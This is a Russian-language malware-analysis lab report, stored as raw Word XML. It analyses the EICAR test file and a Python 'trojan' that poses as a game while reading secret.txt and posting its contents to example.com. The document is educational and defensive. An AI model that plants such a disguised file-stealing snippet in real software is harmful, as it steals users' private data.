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5D80" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8CBE15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Что такое вредоносное ПО (вирусы, трояны, вымогатели)? Принцип работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68650983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Вредоносное ПО (ВПО, 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malware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программы, созданные для нанесения ущерба, кражи данных или несанкционированного доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072AD749" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Вирусы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заражают файлы, распространяются через исполняемые файлы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191C631" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Трояны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маскируются под легитимные программы, крадут данные или открывают бэкдоры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D01E5" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Вымогатели (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Ransomware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шифруют файлы и требуют выкуп.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE7B98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Принципы анализа вредоносного ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808420C" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Статический анализ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изучение кода без запуска (декомпиляция, поиск строк, сигнатур).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDA994E" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Динамический анализ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запуск в изолированной среде (песочнице) и мониторинг поведения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60382218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Правила безопасности при исследовании ВПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480EDF9" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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 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изолированные среды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(виртуальные машины).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413661F1" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Отключать 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 и общие папки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583763" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Запрещать 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автозапуск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образцов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7951ACD3" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Работать в 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ограниченной учётной записи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600F04" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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743B518">
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CE9BC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Практические задания</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0FD6F8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1: Подготовка среды</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6C3BB" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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 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Windows 10 на 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VirtualBox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7FBC65" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr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инструменты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B31E7" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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FakeNet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-NG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(имитация сети)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19664223" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Process Monitor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(мониторинг процессов)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0303FCAE" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Ghidra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(статический анализ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B014905" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Отключить 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сеть в настройках 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VirtualBox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5B2C4C" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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B8749E2">
          <v:rect id="_x0000_i1026" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF242B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2: Анализ EICAR-образца</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB672E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Файл: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eicar.com (тестовый, не вредоносный).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A121637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Статический анализ в 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Ghidra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2EB3943" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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</w:t>
      </w:r>
      <w:r w:rsidRPr="000405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0405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</w:t>
      </w:r>
      <w:r w:rsidRPr="000405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Pr="000405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EICAR-STANDARD-ANTIVIRUS-TEST-FILE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35008DCA" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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Программа не выполняет вредоносных действий, только выводит текст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C5F0A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Динамический анализ с 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FakeNet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9E6E89D" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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 fakenet.exe -</w:t>
      </w:r>
      <w:proofErr w:type="gram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d .</w:t>
      </w:r>
      <w:proofErr w:type="gram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→ запустить eicar.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A768AC1" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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FakeNet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Сетевых запросов нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5DF09" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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02A6029">
          <v:rect id="_x0000_i1027" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A3CB4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3: Анализ поведения EICAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01379678" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Process Monitor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установить фильтры:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C941B3C" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 Name = eicar.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5BBFD" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Operation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CreateFile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RegSetValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5069D37E" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 eicar.com и проверить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E368E9" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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файлов: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Нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C67D8" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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реестра: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Нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168A1F5" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Сетевые запросы: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Нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A21B3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Безопасный тестовый файл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438BA6DF" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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4B7BE84">
          <v:rect id="_x0000_i1028" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D807E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4: Исследование "трояна" (game.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287468D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(Python-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аналог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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA74D4" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850A82E" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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7950CB44" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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2B92F8C0" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405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405DF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import</w:t>
      </w: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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D99C5" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405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405DF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os</w:t>
      </w:r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path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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0405DF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"C:\\secret.txt"</w:t>
      </w:r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61E0E0FF" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405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requests</w:t>
      </w:r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post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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0405DF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"http://example.com"</w:t>
      </w:r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data</w:t>
      </w:r>
      <w:r w:rsidRPr="000405DF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0405DF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open</w:t>
      </w:r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0405DF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"secret.txt"</w:t>
      </w:r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).</w:t>
      </w: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read</w:t>
      </w:r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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B248CF4" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405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405DF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else</w:t>
      </w:r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144018DA" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405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0405DF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gramStart"/>
      <w:r w:rsidRPr="000405DF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print</w:t>
      </w:r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0405DF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"Game started!!"</w:t>
      </w:r>
      <w:r w:rsidRPr="000405DF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</w:p>
    <w:p w14:paraId="7A061D1D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1. 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Статический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Ghidra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797CB08" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr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Найти строку example.com → обнаружить функцию чтения файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554E884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Динамический анализ (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ProcMon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5568FE65" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 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чтение secret.txt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подключение к example.com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F45F01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Программа пытается отправить данные из secret.txt на удалённый сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED7BEF" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF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8149B94">
          <v:rect id="_x0000_i1029" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B8601C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14:paraId="5D4BD54E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Таблица результатов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2239"/>
        <w:gridCol w:w="2155"/>
        <w:gridCol w:w="2505"/>
      </w:tblGrid>
      <w:tr w:rsidR="000405DF" w:rsidRPr="000405DF" w14:paraId="79F87721" w14:textId="77777777" w:rsidTr="000405D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4307F3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Образец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4BD5C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Создает файлы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14239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Меняет реестр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64957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Сетевые запросы</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000405DF" w:rsidRPr="000405DF" w14:paraId="1968389D" w14:textId="77777777" w:rsidTr="000405D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FF15BD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eicar.com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1CB1B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97D50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929E0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0405DF" w:rsidRPr="000405DF" w14:paraId="64644864" w14:textId="77777777" w:rsidTr="000405D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50A864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game.exe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8D781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 (secret.txt)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014CD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EB5D" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405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05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 (example.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="763A1D09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Ответы на вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78D403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Признаки вредоносного поведения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A46BC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конфиденциальных файлов (secret.txt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44289DB9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данных на внешний сервер (example.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65378CC2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Почему EICAR безопасен?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FE46B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 </w:t>
      </w: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тестовый файл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выполняющий вредоносных действий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A8C9A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FakeNet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помогает?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40BE78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Имитирует сеть, перехватывает запросы, не давая ВПО подключиться к реальным серверам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D7E939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ВПО:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531AEB33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Вирусы, трояны, черви, руткиты, </w:t>
      </w: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ransomware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spyware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BDE5E9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анализа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229F914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функционала, выявление угроз, разработка защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F456183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Разница статического и динамического анализа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BAB223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Статический</w:t>
      </w:r>
      <w:proofErr w:type="gram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Без</w:t>
      </w:r>
      <w:proofErr w:type="gram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запуска (декомпиляция, строки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50B080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Динамический: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запуском (мониторинг поведения).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FD26C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статического анализа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8874B7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Ghidra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IDA Pro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декомпиляция, поиск сигнатур.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F27781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Обфускация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во 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вредоносах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7DF86B3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Усложняет анализ (шифрование строк, запутывание кода).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F5E04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Признаки ВПО:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0682E3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Подозрительные строки (http://, secret.txt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D82A95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реестра, создание файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E69A87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Песочница (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sandbox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17C30563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Изолированная среда для безопасного запуска ВПО.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2605C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Обход антивирусов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69278881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Полиморфизм, упаковка, </w:t>
      </w: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инжектирование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легитимные процессы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACA9F6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Инъекция кода:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770107D3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вредоносного кода в работающие процессы (DLL-инжекция).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D961219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динамического анализа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01415161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→ мониторинг (файлы, реестр, сеть) → анализ логов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBB94D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 статического анализа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25608841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Импорты, строки, сигнатуры, алгоритмы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357FD49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Изучение поведения для защиты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619C7A90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Помогает создавать сигнатуры, </w:t>
      </w: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патчить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уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16C41F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Сценарии использования ВПО:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436EC2FC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Кража данных, </w:t>
      </w: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DDoS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, шпионаж, вымогательство.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B22B4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Обратная разработка (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Engineering):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF0F1B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бинарного кода для восстановления логики.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E37618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 анализа в реальной среде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15365728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Заражение системы, утечка данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA443D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Меры предосторожности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8C687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Виртуализация, отключение сети, использование инструментов (</w:t>
      </w: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FakeNet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B45183C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для расследований:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFA4EA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источника атаки, тактик злоумышленников.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57268D3B" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Этические аспекты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0503AB" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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знания только в легальных целях (белый хакинг).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446AC543" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405D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4F1E64D8" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr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EICAR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безопасный тестовый файл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F9393" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr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Game.exe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демонстрирует поведение трояна (кража данных).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D57D3" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr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Ghidra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(статический анализ), </w:t>
      </w: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ProcMon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(динамический), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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FakeNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(сеть).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F294C" w14:textId="77777777" w:rsidR="000405DF" w:rsidRPr="000405DF" w:rsidRDefault="000405DF" w:rsidP="000405DF">
      <w:pPr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5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Безопасность:</w:t>
      </w:r>
      <w:r w:rsidRPr="000405DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> Виртуализация, изоляция, мониторинг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A80E0E" w14:textId="77777777" w:rsidR="00CE513C" w:rsidRDefault="00CE513C"/>
    <w:sectPr w:rsidR="00CE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EB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9596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15BF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CEF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C505D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B6C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22A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D294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B2DF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB2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62AEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6598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6718E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5900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93135"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14FA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27549"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68A8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71F17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBF2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3480F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C3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9A"/>
    <w:rsid w:val="000405DF"/>
    <w:rsid w:val="002F159A"/>
    <w:rsid w:val="00C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5CF77-2234-45FE-9731-91CA0078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0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40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405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05D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405DF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ds-markdown-paragraph">
    <w:name w:val="ds-markdown-paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="0004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05D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0405DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-info-button-text">
    <w:name w:val="code-info-button-text"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000405DF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0004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05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4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7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1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0102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73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0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2025-06-06T14:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-06T14:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>